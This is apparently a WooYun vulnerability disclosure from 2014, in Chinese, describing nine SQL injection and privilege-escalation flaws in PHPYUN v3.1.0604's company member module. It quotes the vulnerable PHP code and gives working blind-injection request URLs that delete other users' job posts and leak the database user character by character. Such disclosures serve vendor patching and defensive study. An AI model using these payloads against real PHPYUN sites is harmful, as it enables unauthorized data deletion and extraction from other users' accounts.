当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064323

漏洞标题:PHPYUN最新版多处SQL注入及越权操作

相关厂商:php云人才系统

漏洞作者: xfkxfk

提交时间:2014-06-10 14:26

修复时间:2014-09-08 14:28

公开时间:2014-09-08 14:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-10: 细节已通知厂商并且等待厂商处理中
2014-06-10: 厂商已经确认,细节仅向厂商公开
2014-06-13: 细节向第三方安全合作伙伴开放
2014-08-04: 细节向核心白帽子及相关领域专家公开
2014-08-14: 细节向普通白帽子公开
2014-08-24: 细节向实习白帽子公开
2014-09-08: 细节向公众公开

简要描述:

PHPYUN最新版(phpyun_v3.1.0604_gbk)多处SQL注入及越权操作
这里一共存在九处SQL注入及越权操作!!!

详细说明:

这里一共存在九处SQL注入及越权操作!!!
文件/member/model/com.class.php
第一处SQL注入、越权删除职位信息:

function job(){
......
if($_GET['del'] || is_array($_POST['checkboxid'])){
if(is_array($_POST['checkboxid'])){
$layer_type=1;
$delid=@implode(",",$_POST['checkboxid']);
}else if($_GET['del']){
$layer_type=0;
$delid=$_GET['del'];
}
$nid=$this->obj->DB_delete_all("company_job","`id` in (".$delid.") and `uid`='".$this->uid."'"," ");
if($nid){
$rows=$this->obj->DB_select_all("company_job","`id` in (".$delid.") and `r_status`<>'2'","`state`");
if(is_array($rows)){
$status0=$status1=$status2=$status3=0;
foreach($rows as $v){
if($v['state']=="0"){
$status0=$status0+1;
}elseif($v['state']=="1"){
$status1=$status1+1;
}elseif($v['state']=="2"){
$status2=$status2+1;
}elseif($v['state']=="3"){
$status3=$status3+1;
}
}
$num=count($rows);
$value.="`status0`=`status0`-$status0,";
$value.="`status1`=`status1`-$status1,";
$value.="`status2`=`status2`-$status2,";
$value.="`status3`=`status3`-$status3,";
$value.="`job`=`job`-$num";
$this->obj->DB_update_all("company_statis",$value,"uid='".$this->uid."'");
}
$newest=$this->obj->DB_select_once("company_job","`uid`='".$this->uid."' order by lastupdate DESC","`lastupdate`");
$this->obj->update_once("company",array("jobtime"=>$newest['lastupdate']),array("uid"=>$this->uid));
$this->layer_msg('删除成功!',9,$layer_type,$_SERVER['HTTP_REFERER']);
}else{$this->layer_msg('删除失败!',8,$layer_type,$_SERVER['HTTP_REFERER']);}
}


这里的$delid=$_GET['del'];
没有经过任何保护直接进入:DB_delete_all和DB_select_all
跟进DB_delete_all函数:

function DB_delete_all($tablename, $where, $limit = 'limit 1'){
$SQL = "DELETE FROM `" . $this->def . $tablename . "` WHERE $where $limit";
$this->db->query("set `sql_mode`=''");
return $this->db->query($SQL);


这里也没有处理,导致SQL注入
而且这里可以通过截断后面的:and `uid`='".$this->uid."'",修改uid的值,uid为用户的用户id,这样就可以越权操作,删除任意用户的职位信息了。
第二处SQL注入、越权删除用户系统信息:

function sysnews_action(){
if ($_POST['del']||$_GET['del']){
if(is_array($_POST['del'])){
$ids=@implode(',',$_POST['del']);
$layer_type='1';
}else if($_GET['del']){
$ids=$_GET['del'];
$layer_type='0';
}
$nid=$this->obj->DB_delete_all("sysmsg","`id` in(".$ids.") AND `fa_uid`='".$this->uid."'"," ");
$nid?$this->layer_msg('删除成功!',9,$layer_type):$this->layer_msg('删除失败!',8,$layer_type);
}
$urlarr=array("c"=>"sysnews","page"=>"{{page}}");
$pageurl=$this->url("index","index",$urlarr);
$this->get_page("sysmsg","`fa_uid`='".$this->uid."' order by id desc",$pageurl,"10");
$this->public_action();
$this->yunset("js_def",7);
$this->com_tpl('sysnews');
}


这里的$ids=$_GET['del'];
没有经过任何保护进入了DB_delete_all函数,导致SQL注入
由于这里的fa_uid就是此用户的uder id,这里我们通过截断后面的fa_uid,修改fa_uid为任意用户的id,就可以通过越权操作,删除任意用户的系统信息了。
第三、四、五、六处SQL注入、越权操作:

function hr_action()
{
if($_POST['ajax']==1 && $_POST['ids'])
{
$this->obj->DB_update_all("userid_job","`is_browse`='2'","`id` in (".@implode(",",$_POST['ids']).") and `com_id`='".$this->uid."'");die;//第三处ids存在注入;
}
if($_POST['delid']||$_GET['delid']){
if(is_array($_POST['delid'])){
$id=@implode(",",$_POST['delid']);
$layer_type='1';
}else{
$id=$_GET['delid'];
$layer_type='0';
}
$sq_num = $this->obj->DB_select_all("userid_job","`id` in (".$id.") and `com_id`='".$this->uid."'","`uid`");//第四处id=delid存在注入;
if(is_array($sq_num)){
foreach($sq_num as $v){
$a[]=$v['uid'];
}
}
$user_id=@implode(",",$a);
$data['sq_jobnum']="`sq_jobnum`"-count($sq_num);
$this->obj->update_once("member_statis",$data,"uid in (".$user_id.")");
$nid=$this->obj->DB_delete_all("userid_job","`id` in (".$id.") and `com_id`='".$this->uid."'"," ");//第五处这里的id也存在注入;
$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=hr"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=hr");
}
if(!empty($_GET['keyword'])){
$rows=$this->obj->DB_select_all("resume","`name` like '%".$_GET['keyword']."%' and `r_status`<>'2'","`uid`");
if(is_array($rows) && !empty($rows)){
foreach($rows as $v){
$uidarr[]=$v['uid'];
}
$urlarr['keyword']=$_GET['keyword'];
$where=" uid in (".@implode(',',$uidarr).") and ";
}
}
if($_GET['job_id']){
$where ="job_id=".$_GET['job_id']." and ";
$urlarr['job_id']=$_GET['job_id'];
}
$this->public_action();
$urlarr['c']="hr";
$urlarr['page']="{{page}}";
$pageurl=$this->url("index","index",$urlarr);
$rows=$this->get_page("userid_job",$where." `com_id`='".$this->uid."'",$pageurl,"10");//第六处这里的job_id进入where存在注入
if(is_array($rows) && !empty($rows))
{
foreach($rows as $v)
{
$uid[]=$v['uid'];
}
$userrows=$this->obj->DB_select_all("resume","`uid` in (".@implode(",",$uid).") and `r_status`<>'2'","`name`,`sex`,`edu`,`uid`");
if(is_array($userrows))
{
include(PLUS_PATH."user.cache.php");
foreach($rows as $k=>$v)
{
foreach($userrows as $val)
{
if($v['uid']==$val['uid'])
{
$rows[$k]['name']=$val['name'];
$rows[$k]['sex']=$userclass_name[$val['sex']];
$rows[$k]['edu']=$userclass_name[$val['edu']];
}
}
}
}
}
$this->yunset("rows",$rows);
$this->company_satic();
$this->yunset("js_def",5);
$this->com_tpl('hr');
}


上面的注入点都已经表名,见后面的漏洞证明,证明漏洞存在
第七处SQL注入、越权删除黑名单

function blacklist_action()
{
if($_POST['delid']){
if(is_array($_POST['delid'])){
$id=@implode(",",$_POST['delid']);
$layer_type='1';
}else{
$layer_type='0';
}
$id=@implode(",",$_POST['delid']);
$nid=$this->obj->DB_delete_all("blacklist","`id` in (".$id.") and `c_uid`='".$this->uid."'"," ");
$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=blacklist"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=blacklist");
}


这里的$id=@implode(",",$_POST['delid']);
没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户的黑名单信息。
第八处SQL注入、越权删除用户邀请信息

function invite_action()
{
if($_POST['delid'] || $_GET['del'])
{
if($_GET['del'])
{
$id=$_GET['del'];
$layer_type='0';
}else{
$id=@implode(",",$_POST['delid']);
$layer_type='1';
}
$nid=$this->obj->DB_delete_all("userid_msg","`id` in (".$id.") and `fid`='".$this->uid."'"," ");
$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=invite"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=invite");
}


这里的$id=$_GET['del'];
没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户的邀请信息。
第九处SQL注入、越权操作

function down_action()
{
if($_POST['delid'] || $_GET['del'])
{
if($_GET['del'])
{
$id=$_GET['del'];
$layer_type='0';
}else{
$id=@implode(",",$_POST['delid']);
$layer_type='1';
}
$id=$_GET['del']?$_GET['del']:@implode(",",$_POST['delid']);
$nid=$this->obj->DB_delete_all("down_resume","`id` in (".$id.") and `comid`='".$this->uid."'"," ");
$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=down"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=down");
}


这里的$id=$_GET['del']?$_GET['del']:@implode(",",$_POST['delid']);
没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户信息。

漏洞证明:

这里拿第一处SQL注入、越权删除职位信息为例:
两个企业用户:
攻击者:111111,uid=3,发布的职位信息id=2,
受害者:222222,uid=4,发布的职位信息id=4,
我们先来看看用户222222发布的职位信息:

1.png


然后用户111111发送请求:
http://localhost/phpyun/member/index.php?c=job&del=if(substring(user(),1,1)=char(111),4,888))/**/and `uid`=4%23
将uid设置为受害者222222的uid=4

2.png


这然后查看用户222222的发布职位信息,仍然存在,没有删除
修改char的值,继续发送请求:
http://localhost/phpyun/member/index.php?c=job&del=if(substring(user(),1,1)=char(114),4,888))/**/and `uid`=4%23

3.png


此时在访问用户222222的发布职位信息时,职位信息已经被删除:

4.png


这列通过修改char的值,遍历得到user()=root
也通过设置uid为其他任意用户,导致越权操作,可删除其他用户的发布职位信息。

修复方案:

过滤,引号保护

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-06-10 14:55

厂商回复:

感谢您的提供,我们会继续完善!

最新状态:

暂无